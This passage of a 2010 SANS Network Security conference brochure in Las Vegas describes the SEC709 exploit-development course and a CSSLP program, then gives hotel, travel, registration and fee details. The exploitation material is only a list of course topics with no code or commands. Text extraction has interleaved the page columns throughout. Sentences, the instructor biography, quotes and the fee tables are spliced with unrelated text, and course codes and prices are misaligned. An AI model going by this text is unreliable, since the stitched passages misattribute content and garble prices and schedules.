and Windows operating systems and how exploitation truly works under
the hood. This five-day course rapidly progresses through exploitation
techniques used to attack stacks, heaps, and other memory segments on
Linux and Windows. This is a fast-paced course that provides you with the
skills to hit the ground running with vulnerability research. We end the course
with a Capture the Flag (CTF) exercise requiring you to discover and exploit
vulnerabilities on remote systems.
AUTHOR STATEMENT
As a perpetual student of information security, Attendees can apply the skills developed in this class to create and customize
I am excited to offer this course documenting exploits for penetration tests of homegrown software applications and newly
the steps I took when diving head first into discovered flaws in widespread commercial software. Understanding the
exploitation and writing Proof of Concept process of exploit development can help enterprises analyze their actual
(POC) code. In all of my years focusing on these
business risks better than the ambiguous hypotheticals we often contend with
topics, I found many holes and unanswered
questions. With this course I aim to bridge in most traditional vulnerability assessments.
the gap between the daily practice of security This course is not for the faint of heart or those
engineering and the advanced world of security with modest skills. It provides leading-edge
research and hacking. Attackers are always one
skills for the best technical security professionals,
step ahead and are relying on our tendency to
become complacent with controls we work so security researchers, and pen testers. If you
hard to deploy. If you find this topic as fascinat- are able to absorb it, the knowledge gained
ing as I do, I look forward to seeing you soon! throughout the course will help you write
- Stephen Sims custom exploits to gain privileged system access
and determine the real risk to your business.
66 SANS Network Security 2010 Precompiled exploits won’t help you here! Cyber Guardian Program
September 19 - 29, 2010 www.sans.org/cyber-guardian
709.1 Fuzzing for Bug Discovery*
Day one is a hands-on fuzzing day where we’ll examine the methods, techniques and tools behind
the use of fuzzing for vulnerability analysis. Credited for identifying numerous vulnerabilities in software
ranging from Cisco routers to the Windows RPC service, fuzzing is an important component of software
testing. We’ll quickly introduce the operational aspects of fuzzing and focus the day on how you can
leverage these techniques in your organization as a penetration tester, developer, QA engineer or
information security engineer, complete with case-studies of fuzzing success stories. This is followed by
the use of fuzzing tools and custom frameworks to test any service or file format for flaws, including several
hands-on exercises against live systems.
Topics: Establishing a Target Environment; Monitoring and Fault Identification Techniques; Designing Fuzzing Test Cases;
Quick-Start with Mutation-Based Fuzzing; Targeting Protocol Behavior for Improved Results; Building a Custom
Fuzzer Using the Sulley Framework; Leveraging Sulley for Post-Mortem Analysis; File Format Fuzzing
709.2 Linux Memory and Stack Exploitation*

Day two begins with an important framework that will allow us to progress quickly. We walk through
the world of x86 processors, assembly, and memory layout. This is followed by diving head first into
stack-based overflows. Much of the focus is on methods used to bypass OS and compiler-time controls,
such as Write XOR Execute (Data Execution Prevention), Stack Canaries, and Address Space Layout
Randomization (ASLR).
Topics: Stack and Dynamic Memory Management and Allocation on the Linux OS; Disassembling a Binary and Analyzing
x86 Assembly Code; Performing Symbol Resolution on the Linux OS; Identifying and Analyzing Basic Stack-based
Certified Instructor Overflows on the Linux OS; Performing Return-to-libc (ret2libc) Attacks on the Stack; Defeating Stack Protection
Stephen Sims on the Linux OS; Defeating ASLR on the Linux OS
Stephen Sims is an information 709.3 Advanced Linux Exploitation and Introduction to Windows*
security consultant currently Beginning with understanding format strings and their purpose, we then progress to discovering format
working for Wells Fargo in string vulnerabilities and what types of attacks can be performed. This is followed by a format string
exercise with the goal of taking control of a process. The next section focuses on heap exploitation
San Francisco, California. He followed by writing your own shellcode, including an exercise of writing shellcode to spawn a shell
has spent the past eight years on Linux systems. We then change our focus from Linux over to Windows and take a tour of symbol
resolution from a Windows perspective. We’ll take a look at the assembly syntax and basic process
in San Francisco working for debugging. This is followed by analyzing the method in which the Windows OS manages memory in
several large financial institu- various segments and many of the protections added from XP to Vista.
Topics: Abusing the Unlink() Macro on the Linux OS; Overwriting C and C++ Function Pointers; Identifying Format String
tions on network and systems Vulnerabilities; Taking Control of a Process Via a Format String Exploit; Understanding Shellcode; Writing Efficient
security, penetration testing, Shellcode by Removing Null Bytes and Register Optimization; Understanding Symbol Resolution with the PE/
COFF Object File Format; Understanding the Difference Between Intel and AT&T x86 Assembly Format; Basic
exploitation development, Debugging with Ollydbg; Understanding Modern OS and Memory Protections on Windows
and risk assessment and 709.4 Windows Stack and Heap Exploitation*
management. Prior to San On day four we start off by discovering a remote vulnerability on a Windows system through fuzzing.
Francisco, Stephen worked Once the vulnerability is discovered, you’ll use a debugger to find the exact location of the vulnerability
and learn how to take control of the process. We then add in and bypass protections added to Windows
in the Baltimore/DC area as a XP SP2&3 and Vista. We will look at Windows heap exploitation, including methods to abuse the Process
network security engineer for Environment Block (PEB) and other constructs to gain control of a process. We move from there into
browser-based exploitation and how to increase the chances of exploitation through heap spraying. The
companies such as General day ends with looking at Windows shellcode and how it differs from Linux.
Motors and Sylvan Prometric. Topics: Using a Debugger to Analyze a Program; Basic Fuzzing to Discover Vulnerabilities; Abusing the Windows Stack
Implementation; Abusing Structured Exception Handling (SEH) to Gain Control of a Program; Abusing the
He is one of only a handful of SafeSEH and DEP Controls Added to Windows XP SP2/3; Defeating Hardware Enforced DEP; Exploiting the
Process Environment Block (PEB) to Gain Program Control; Analyzing a Browser-based Vulnerability and Use Heap
individuals who holds the GIAC Spraying to Increase Success; Understanding Windows Shellcode and DLL Resolution
Security Expert (GSE) Certifica-
tion and also helps to author
709.5 Client-Side Exploitation and Patch Reversing*
Day five is an advanced day on Microsoft patch reversal and client-side exploitation. It is well known that
and maintain the current attackers download Microsoft patches as soon as they are available on “Patch Tuesday” of each month.
version of the exam. He is a Other vendors experience the same problem. The attacker’s goal is to reverse engineer the patches to
locate the code changes, making it possible to quickly identify the vulnerability. Exploit code is often
SANS certified instructor and generated within days, or even hours after discovery. Day five walks through the techniques used
the course author of SANS’ to perform reversing and binary diffing. Once the vulnerability is located, you will walk through
debugging and exploit generation of a client-side attack.
first and only 700-level course,
Topics: Using IDA Pro to Reverse Engineer Microsoft Patches; Using the BinDiff Tool to Identify Code
SEC709: Developing Exploits Changes; Improve Microsoft Stack and Heap Exploitation Skills; Vulnerability Discovery in Less
Obvious Places; Understand and Develop Client-Side Exploits
for Penetration Testers and
Security Researchers. Stephen 709.6 Capture the Flag*
Day six is a full day of Capture the Flag (CTF) exercises. There will be various types of Register at
also holds the CISSP, CISA, and
vulnerabilities to discover and exploit with the goal of capturing flags. Utilizing all www.sans.org/
Network Offense Professional of the knowledge gained throughout the course, you will work independently network-security-2010
(NOP) certifications, amongst or as a team to polish your skills and capture the most flags.
others. *This course is available to Security 709 participants only. SANS Network Security 2010
September 19 - 29, 2010 67
Hosted
Five-Day Program • Mon, Sept 20 - Fri, Sept 24, 2010 • 9:00am - 6:00pm
Who Should Attend 35 CPE Credits • Laptop Required • Instructor: Manu Paul
• Software architects
• Software engineers/designers
• Software development It’s no secret that security is not being addressed from a
managers holistic perspective throughout the software lifecycle.
• Requirements analysts
Some 70% of all security breaches are application related, equating to more
• Project managers than 226 million records being disclosed and fines reaching astronomical amounts.
• Business and IT managers Together we have a solution that establishes industry standards and instills best
• Auditors practices in the software lifecycle (SLC).
• Developers and coders The (ISC)2 five-day CSSLP® CBK Education Program is the exclusive way to learn
• Security specialists security best practices and industry standards for the software lifecycle – critical
• Auditors and quality information to a CSSLP. This is where you will learn tools and processes on how
assurance managers security should be built into each phase of the software lifecycle. It will also detail
• Application owners security measures that need to take place beginning with the requirement phase,
through software design, all the way through software testing, and ultimately
disposal. This will ensure you’re properly prepared to take on the constantly evolving
vulnerabilities exposed in software development. Each software stakeholder is
responsible for certain phase(s) of the SLC, but all phases must have security built
into them. CSSLP is for all the stakeholders involved in the process. Each of the
seven CSSLP Domains (www.isc2.org/csslp-certification.aspx) covers how to build
security into the different phases.
The comprehensive (ISC)2 CSSLP CBK Education
“The course contains
program covers the following domains:
pertinent information
• Secure Software Concepts - security implications in
software development that I can immediately
• Secure Software Requirements - capturing security requirements use at work.”
in the requirements gathering phase -DAVID TATUM, FISERV, INC.
• Secure Software Design - translating security requirements into application
Download a brochure design elements CSSLP Man
to learn more about the • Secure Software Implementation/Coding - unit testing for security functionality
CSSLP. and resiliency to attack, and developing secure code and exploit mitigation
http://www.isc2.org/up- • Secure Software Testing - integrated QA testing for security functionality and
loadedFiles/Landing_Pages/ resiliency to attack
with_form/CSSLP%20Prof% • Software Acceptance - security implication in the software acceptance phase
20Web.pdf
• Software Deployment, Operations, Maintenance, and Disposal - security issues
Please note that the price around steady state operations and management of software
of tuition does NOT include
the CSSLP exam. Host: (ISC)2 CSSLP
http://www.isc2.org/ (ISC)2® is the globally recognized Gold Standard for certifying information
uploadedFiles/Certification_ security professionals. Founded in 1989, (ISC)2® has certified nearly 60,000
Programs/exam_pricing.pdf information security professionals in 135 countries. (ISC)2® issues the
Certified Information Systems Security Professional (CISSP®) and related
concentrations, Certification and Accreditation Professional (CAP®),
and Systems Security Certified Practitioner (SSCP®) credentials to those
September 19 - 29, 2010 meeting necessary competency requirements. http://www.isc2.org Manu Paul
Future SANS Training Events
SANS Rocky Mountain 2010
July 12-17, 2010
www.sans.org/rocky-mountain-2010
Denver MGT414 • MGT512 • SEC401 • SEC503 • SEC560 • SEC566 • FOR408 • And More
SANS Boston 2010

August 2-8, 2010
www.sans.org/boston-2010
Boston AUD507 • MGT512 SEC401 • SEC504 • SEC505 • SEC542 • SEC566 • FOR408 • And More
SANS Portland 2010

August 23 - 28, 2010
www.sans.org/portland-2010
Portland, OR MGT414 • SEC501 • SEC504 • FOR408
SANS Virginia Beach 2010

August 29 - September 3, 2010
www.sans.org/virginia-beach-2010
Virginia Beach MGT512 • SEC401 • SEC503 • SEC504 • SEC560 • SEC566 • SEC709 • FOR558 • And More

September 19-29, 2010
www.sans.org/network-security-2010
AUD507 • MGT414 • MGT525 • MGT525 • SEC301 • SEC401 • SEC502
Las Vegas SEC503 • SEC504 • SEC505 • SEC506 • SEC509 • SEC542 • SEC557 • SEC560
SEC617 • SEC709 • FOR408 • FOR508 • FOR558 • FOR563 • FOR610 • And More
SANS Chicago 2010

October 25-31, 2010
Chicago www.sans.org/chicago-2010
SANS Tysons Corner 2010

Fall, 2010
Tysons Corner www.sans.org/tysons-corner-2010
SANS San Antonio 2010

November 13-20, 2010
San Antonio www.sans.org/san-antonio-2010
SANS Cyber Defense Initiative 2010

December 10-16, 2010
Washington, DC www.sans.org/cyber-defense-initiative-2010
Dates,locations, and courses offered are subject to change. For up-to-date information, visit www.sans.org.
September 19 - 29, 2010 69
will be located at
Caesars Palace
43570 Las Vegas Blvd. • Las Vegas, NV 89109
Web site: http://www.caesarspalace.com
Reservations: 1-800-634-6661
SPECIAL RATES
A special discount rate of $192 S/D will be honored based on space
availability. Government per diem rooms are available with proper ID;
You will need to call reservations and ask for the SANS government rate.
These rates includes high speed Internet in your room.
Make your reservations now as this special rate is only available
through Wednesday, September 1, 2010.
NOTE: You must mention that you are attending the SANS Institute
training event to get the discounted rate.
The resort will require a major credit card to guarantee your reservation. To cancel your reservation,
you must notify the resort at least 72 hours before your planned arrival date.
Welcome to the most prestigious resort in the world. From the shops of world-re-
Amtrak offers
nowned designers like Valentino and Louis Vuitton to the celebrity clientele at PURE
a 10% discount nightclub, you’ll discover legendary shopping and nightlife at Caesars Palace, plus a
off the lowest available rail world of luxury at our extraordinary swimming pools and spa.
fare to Las Vegas, NV. Please check the
Caesars Palace wants to lavish you with all the amenities that will make your stay
Web site for new code. with us one you’ll always remember. Discover indulgence beyond expectation at
www.sans.org/network-security-2010/ Qua Baths & Spa, featuring never before seen amenities like Roman baths, a dry-heat
location.php Laconium room and a stunning, snow-filled Arctic Ice room. Caesars Palace is also
To book your reservation call Amtrak at the home of celebrity stylist Michael Boychuck, “colorist to the stars.” Every salon in
1 (800) 872-7245 or contact your local travel agent. town he’s touched has become a must-visit destination, and now Color, a Salon by
Conventions cannot be booked via Internet. This Michael Boychuck is exclusively at Caesars Palace.
offer is not valid on Auto Train or Acela service. At the Garden of the Gods Pool Oasis, graceful fountains and classically inspired
Offer valid with Sleepers, Business Class, or First statuary surround three large swimming pools and two outdoor whirlpool spas so
Class seats with payment of the full applicable you can relax with friends around sparkling waters.
accommodation charges. Fare is valid on After exploring all that our spa, salon, and pools have to offer, you can shop at more
Metroliner service for all departures seven days a than 120 stores in two elegant settings. The names on the storefronts are legend-
week, except for holiday blackouts. ary, and the merchandise inside is the best the world has to offer. From Cartier and
Roberto Cavalli to Salvatore Ferragamo, you can browse through the world’s finest
AVIS is proud to offer special rates for stores at the Forum Shops and Appian Way.
SANS Network Security 2010. Make your
Then, cap off your night at PURE, our remarkable club that sets new standards for
reservations now and don’t forget to use Las Vegas nightlife. Owned in part by Celine Dion, Shaquille O’Neal, Andre Agassi
your special discount code: J945620. and Steffi Graf, PURE is three stylish venues in one, including a VIP room, a dance
www.avis.com floor with progressive DJs and a large outdoor patio with cascading waterfalls, walls
of fire and breathtaking views of the surrounding Strip.
Weather Conditions Top 5 reasons to stay at Caesars Palace
September in Las Vegas is pleasant with 1 All SANS attendees receive complimentary high-speed Internet when booking in the SANS Block.
highs around 95° and lows near 66°. For 2 No need to factor in daily cab fees and the time associated with travel to alternate hotels.
the latest weather conditions and forecast, 3 By staying at Caesars Palace, you gain the opportunity to further network with your industry peers
please consult www.weather.com. and remain in the center of the activity surrounding the conference.
4 SANS schedules morning and evening events at Caesars Palace that you won’t want to miss!
September 19 - 29, 2010 5 Everything is in one convenient location!
Dear Colleagues and Friends, Five Reasons to Register
SANS Network Security 2010 is back in Las Vegas with more 1. The best career move you will
courses, night sessions, and special events than ever before! With ever make!
SANS stationed in the middle of the world-famous Vegas strip, That’s how one SANS alumnus described the IT secu-
you will find world-famous attractions, shows, restaurants, and rity education and networking opportunities offered
shopping all within walking distance. This city has so much more by SANS. Attending SANS Network Security 2010 is a
to offer than just gambling – come see for yourself! way of investing in your career. To reap the maxi-
mum benefit, read the course descriptions carefully.
The training event will be held at Caesars Palace
Check out the five- and six-day courses plus a wide
(www.caesarspalace.com), which is an attraction in itself! This
variety of one- to four-day skill-based short courses.
property features the Forum Shops with over 160 stores and
14 restaurants. The Garden of the Gods pool complex has 2. Why settle for second best?
just doubled in size. During SANS Network Security 2010, the If you want to increase your understanding of
hotel tentatively has informed us that the Coliseum will have information security and become more effective in
performances by Jerry Seinfeld and Cher. The hotel also has your job, you need to be trained by the best. “SANS
various dining options from high-end celebrity restaurants and provides by far the most in-depth security training
all-you-can-eat buffets to the Market Street Grill, a food court that with the true experts in the field as instructors,” says
is quite popular for a quick bite!
Mark Smith, Costco Wholesale.
Caesars Palace has the largest square footage of any hotel on 3. Challenge yourself!
the strip. Since it will take approximately 10 minutes alone to Consider attempting GIAC (Global Information
get from the front door to your classroom, we advise staying Assurance Certification), the industry’s most
inside the hotel. We also highly recommend you book early since respected technical security certification. GIAC is the
we will not be able to guarantee our special group rate after the
only information security certification for advanced
technical subject areas, including audit, intrusion
deadline. Most guest rooms at Caesars Palace are right next door
detection, incident handling, firewalls and perimeter
to our classrooms, and you will not even need to walk through the
protection, forensics, hacker techniques, and
casino. As an extra treat, you will receive complimentary high-speed
Windows and Unix operating system security.
Internet – but only if you book under the special SANS group rate.
Even though it will be warm outside, you still want to bring a
4. Become part of an elite group.
We’re referring to the group of technical, security-
jacket for the climate-controlled classrooms and cooler evenings.
savvy professionals who have had hands-on training
You will also want to check out the SANS Network Security
through SANS. Material taught in the SANS courses
2010 program guide for all of the action-packed presentations,
directly applies to real-world challenges in your
receptions, and events as well as the social board for student
IT environment. “Six days of training gave me six
gatherings around the city. Please feel free to send me an e-mail months of work to do,” says Steven Marscovetra of
at brian@sans.org for more recommendations of things to do in Norinchukin Bank. “It is amazing how much of the
Las Vegas. training I can apply immediately at work.”
Our goal is to ensure that you have the best possible time at
5. Don’t miss out on a good opportunity!
SANS Network Security 2010! This is your chance to make a great career move, be
taught by the cream of the crop, challenge yourself, and
Brian Correia become part of an elite group during a full week of IT
Director, Business Development & Venue Planning security education and networking opportunities. Come
prepared to learn; we will come prepared to teach.
Visit www.sans.org/network-security-2010 and register today! SANS Network Security 2010

September 19 - 29, 2010 71
How to Register
1. To register, go to www.sans.org/network-security-2010.
Select your course or courses and indicate whether you plan to test for
GIAC certification. If the course is still open, the secure, online registration
server will accept your registration. Sold-out courses will be removed from
the online registration. We do not take registrations by phone.
2. Provide payment information.

Even if you do not want to submit your payment information online,
still complete the online form! There is an option to submit credit card
information for payment by fax or phone once the online form is completed
and you have your invoice number.
SANS ACCEPTS ONLY US and CANADIAN FEDERAL GOVERNMENT
PURCHASE ORDERS
If you normally use a PO and are not part of the federal government, please
see our additional PO information on the tuition information page:
www.sans.org/network-security-2010/tuition.php
3. Print your invoice.

If you need one, you must print YOUR OWN INVOICE at the end of the
online registration process. The invoice will pop up automatically when the
registration is successfully submitted. You may also access your invoice at
https://portal.sans.org/history.
4. E-mail confirmation will arrive soon after you register.
Register Early and Save

DATE DISCOUNT DATE DISCOUNT
Register & pay by 8/11/10 $400.00 8/25/10 $250.00
Get GIAC Group Savings (Applies to tuition only)

15% discount if 12 or more people from the same organization register at the same time
Certified! 10% discount if 8 - 11 people from the same organization register at the same time
• Only $499 when combined 5% discount if 4 - 7 people from the same organization register at the same time
with SANS training To obtain a group discount, complete the discount code request form at
www.sans.org/conference/discount.php prior to registering.
• Deadline to register is the
last day of SANS Network Frequently Asked Questions Cancellation
Security 2010
Frequently asked questions You may subsitute another person in your place
• Price goes to $899 after
about SANS Training and GIAC at any time by sending an e-mail request to
deadline
Certification – the industry registration@sans.org or a fax request to
• Register today at standard for security knowledge 301-951-0140. There is a $300 cancellation fee
registration@sans.org! – are posted at www.giac.org/ per registration. Cancellation requests must be
overview/faq.php. received by Wednesday, September 1, 2010, by
September 19 - 29, 2010 fax or mail-in order to receive a refund.
S A N S T R A I N I
S E C U R I T Y
N G A N D
C U R R I C U L U M
Y O U R C A R E E R R O A D
FORENSICS
M A P SANS Network Security 2010 Registration Fees
Register online at www.sans.org/network-security-2010
Incident Handling
CURRICULUM
SEC501 SEC504 FOR508 Beginners SEC301 NOTE: Intrusion Analysis If you don’t wish to register online,
Advanced Security Hacker Techniques, Computer Forensic If you have experience SEC501 SEC502 SEC503 please call 301-654-SANS(7267) 9:00am - 8:00pm (Mon-Fri) EST and we will fax or mail you an order form.
Essentials – Exploits, and Investigations and SEC301 FOR408
in the field, please Advanced Security Perimeter Intrusion Computer
Enterprise Defender Incident Handling Incident Response Intro to Information
GCED PG 46 GCIH PG 52 GCFA PG 28 Security consider our more Essentials – Protection Detection Forensic Essentials Paid by Paid by Paid after Add Add
advanced course – Enterprise Defender In-Depth In-Depth PG 26
Job-Based Long Courses 8/11/10 8/25/10 8/25/10 GIAC Cert OnDemand
GISF PG 21
GCED PG 46 GCFW PG 48 GCIA PG 50 AUD507 Auditing Networks, Perimeters, and Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,445 $3,595 $3,845 $499 $399
Additional Incident Handling Courses SEC401. DEV522 Defending Web Applications Security Essentials . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,445 $3,595 $3,845
SEC517: Cutting-Edge Hacking Techniques SEC401 Additional Intrusion Analysis Courses FOR408 Computer Forensic Essentials . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,915 $4,065 $4,315 $399
SANS Security FOR508 Computer Forensic Investigations and Incident Response . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,645 $3,795 $4,045 $499 $399
SEC550: Information Reconnaissance: Competitive Intelligence and Online Privacy PG 18
Essentials SEC577: Virtualization Security Fundamentals PG 19 FOR508
Computer Forensic FOR558 Network Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,445 $3,595 $3,845
Bootcamp Style Investigations and FOR563 Mobile Device Forensics. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,625 $3,775 $4.025
GSEC PG 44 Incident Response
Penetration Testing System Administration GCFA PG 28
FOR610 Reverse-Engineering Malware: Malware Analysis Tools and Techniques . . . . . . . . . . . . . . . . . . . . . . $2,745 $2,895 $3,145 $499 $399
LEG523 Legal Issues in Information Technology and Information Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,025 $3,175 $3,425 $499 $399
SEC540 SEC542 SEC560 MGT414 SANS® +S™ Training Program for the CISSP® Certification Exam . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,445 $3,595 $3,845 $499 $399
VoIP Web App Pen Network Pen SEC501 SEC505 SEC506
Advanced Security Securing Securing MGT512 SANS Security Leadership Essentials For Managers with Knowledge Compression™ . . . . . . . . . . $3,895 $4,045 $4,295 $499 $399
Security Testing and Ethical Testing and Ethical
Hacking Hacking Essentials – Windows Linux/Unix FOR558 FOR563 MGT525 Project Management & Effective Communications for Security Professionals & Managers . . . . . . . $3,445 $3,595 $3,845 $499
Enterprise Defender
GWAPT PG 60 GPEN PG 62 Network and Application Network Mobile Device SEC301 Intro to Information Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,025 $3,175 $3,425 $499 $399
GCED PG 46 GCWN PG 54 GCUX PG 56 Forensics Forensics SEC401 SANS Security Essentials Bootcamp Style . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,645 $3,795 $4,045 $499 $399
Security PG 30 PG 32 SEC501 Advanced Security Essentials – Enterprise Defender . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,545 $3,695 $3,945 $499 $399
SEC501 SEC509 SEC502 Perimeter Protection In-Depth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,495 $3,645 $3,895 $499 $399
SEC617 SEC709 Advanced Security Securing SEC503 Intrusion Detection In-Depth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,545 $3,695 $3,945 $499 $399
Wireless Ethical Developing Exploits for Essentials – Oracle
Hacking, Pen Testing, Penetration Testers and FOR610 SEC504 Hacker Techniques, Exploits, and Incident Handling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,545 $3,695 $3,945 $499 $399
Enterprise Defender SEC505 Securing Windows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,495 $3,645 $3,895 $499 $399
and Defenses Security Researchers PG 58 REM: Malware
GCED PG 46 Analysis Tools & SEC506 Securing Linux/Unix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,495 $3,645 $3,895 $499 $399
GAWN PG 64 PG 66
Techniques SEC509 Securing Oracle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,595 $3,745 $3,995 $399
Additional Network and Application Security Courses
Additional Penetration Testing Courses GREM PG 34 SEC542 Web Application Penetration Testing and Ethical Hacking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,445 $3,595 $3,845 $499 $399
SEC440: 20 Critical Security Controls: Planning, Additional System Administration Courses SEC560 Network Penetration Testing and Ethical Hacking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,895 $4,045 $4,295 $499 $399
DEV538: Web App Pen Testing Immersion Implementing, and Auditing
SEC434: Log Management In-Depth SEC566 Implementing & Auditing the Twenty Critical Security Controls - In-Depth . . . . . . . . . . . . . . . . . . . $3,025 $3,175 $3,425
SEC561: Network Penetration Testing: Maximizing the Effectiveness of Reports, SEC556: Comprehensive Packet Analysis PG 18 SEC617 Wireless Ethical Hacking, Penetration Testing, and Defenses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,595 $3,745 $3,995 $499 $399
Exploits, and Command Shells SEC531: Windows Command-Line Kung Fu Additional Forensics Courses
SEC565: Data Leakage Prevention - In Depth PG 17 SEC709 Developing Exploits for Penetration Testers and Security Researchers . . . . . . . . . . . . . . . . . . . . . . . . $3,745 $3,895 $4,145
SEC567: Power Packet Crafting with Scapy PG 18 SEC566: Implementing & Auditing the Twenty Critical SEC546: IPv6 Essentials PG 18 FOR526: Advanced Filesystem Recovery and HOSTED Drive and Data Recovery Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,625 $3,775 $4,025
SEC580: Metasploit Kung Fu for Enterprise Pen Testing PG 19 Security Controls - In-Depth PG 20 SEC564: Hacker Detection for System Administrators PG 19 Memory Forensics PG 17 HOSTED (ISC)2® Certified Secure Software Lifecycle Professional (CSSLP) CBK® Education Program . . . . . $2,745 $2,895 $3,145
If taking
a 5-6 day
Skill-Based Short Courses
A P P L I C AT I O N S E C U R I T Y AUDIT LEGAL MANAGEMENT DEV541 Secure Coding in Java/JEE: Developing Defensible Applications . . . . . . . . . . . . . . . . . . . .
course
N/A $2,645 $2,795 $3,045 $499 $399
CURRICULUM CURRICULUM CURRICULUM CURRICULUM FOR526 Advanced Filesystem Recovery and Memory Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $575 $995 $995 $995 $99
MGT305 Technical Communication and Presentation Skills for Security Professionals . . . . . . . . $855 $1,275 $1,275 $1,275
MGT404 Fundamentals of Information Security Policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $855 $1,275 $1,275 $1,275 $99
Design & Test Secure Coding SEC301 SEC401 SEC301 SEC301 SEC301 SEC401
MGT421 SANS Leadership and Management Competencies. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $675 $1,095 $1,095 $1,095 $99
Intro to SANS Security Intro to Information Intro to Intro to SANS Security
DEV522 DEV530 DEV543 Information Essentials Security Information Information Essentials MGT570 Social Engineering Defense . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $1,150 $1,700 $1,700 $1,700
Defending Web Essential Secure Secure Coding Security Bootcamp Style GISF PG 21 Security Security Bootcamp Style SEC546 IPv6 Essentials . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $575 $995 $995 $995
Applications Coding in Java/JEE in C & C++ GISF PG 21 GSEC PG 44 GISF PG 21 GISF PG 21 GSEC PG 44 SEC550 IPv6 Essentials . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $575 $995 $995 $995 $99
Security Essentials SEC556 Comprehensive Packet Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $575 $995 $995 $995 $99
PG 22 SEC564 Hacker Detection for System Administrators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $1,150 $1,700 $1,700 $1,700
DEV541 DEV544 SEC401
SANS Security SEC565 Data Leakage Prevention – In Depth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N/A $2,645 $2,795 $3,045
Secure Coding Secure Coding Essentials
SEC542 in Java/JEE in .NET AUD507 MGT512 MGT414 MGT525 SEC567 Power Packet Crafting with Scapy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $575 $995 $995 $995
Auditing Networks, Bootcamp Style
Web App GSSP-JAVA PG 15 GSSP-.NET SANS Security SANS® +S™ Project Management SEC577 Virtualization Security Fundamentals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $1,250 $1,800 $1,800 $1,800
Pen Testing and Perimeters, GSEC PG 44
Leadership Essentials Training Program and Effective SEC580 Metasploit Kung Fu for Enterprise Pen Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $1,150 $1,700 $1,700 $1,700
Ethical Hacking and Systems For Managers for the Communications for
GWAPT PG 60 DEV545 GSNA PG 24 with Knowledge CISSP® Certification Security Professionals Individual Courses Available Individual Course Day Rates If Not Taking a Full Course
Secure Coding LEG523 Compression™ Exam and Managers MON 9/20 TUE 9/21 WED 9/22 THU 9/23 FRI 9/24 SAT 9/25
Legal Issues in Paid by Paid by Paid after
in PHP GSLC PG 40 GISP PG 38 GCPM PG 42 AUD507 507.1 507.2 & 507.3 507.4 507.5 507.6 8/11/10 8/25/10 8/25/10
Information
GSSP-PHP Additional Audit Courses Technology and LEG523 523.1 523.2 523.3 523.4 523.5 One Full Day . . . . . . . . . . . . . . . . . . . . . . . . . . . $1,325 $1,325 $1,325
Information Security SEC301 301.1 301.2 301.3 301.4 301.5 Two Full Days . . . . . . . . . . . . . . . . . . . . . . . . . . $2,050 $2,050 $2,050
AUD305: Technical Communication & Presentation Skills
GLEG PG 13 SEC401 401.1 401.2 401.3 401.4 401.5 401.6 Three Full Days. . . . . . . . . . . . . . . . . . . . . . . . . $3,000 $3,000 $3,000
AUD423: Training for the ISACA® CISA® Cert Exam Additional Management Courses
501.1 501.2 501.3 501.4 501.5 501.6 Four Full Days . . . . . . . . . . . . . . . . . . . . . . . . . . $3,250 $3,250 $3,250
Code Review MGT305: Technical Communication and Presentation Skills PG 15
SEC501
AUD429: IT Security Audit Essentials Bootcamp SEC503 503.1 Five Full Days . . . . . . . . . . . . . . . . . . . . . . . . . . $3,800 $3,800 $3,800
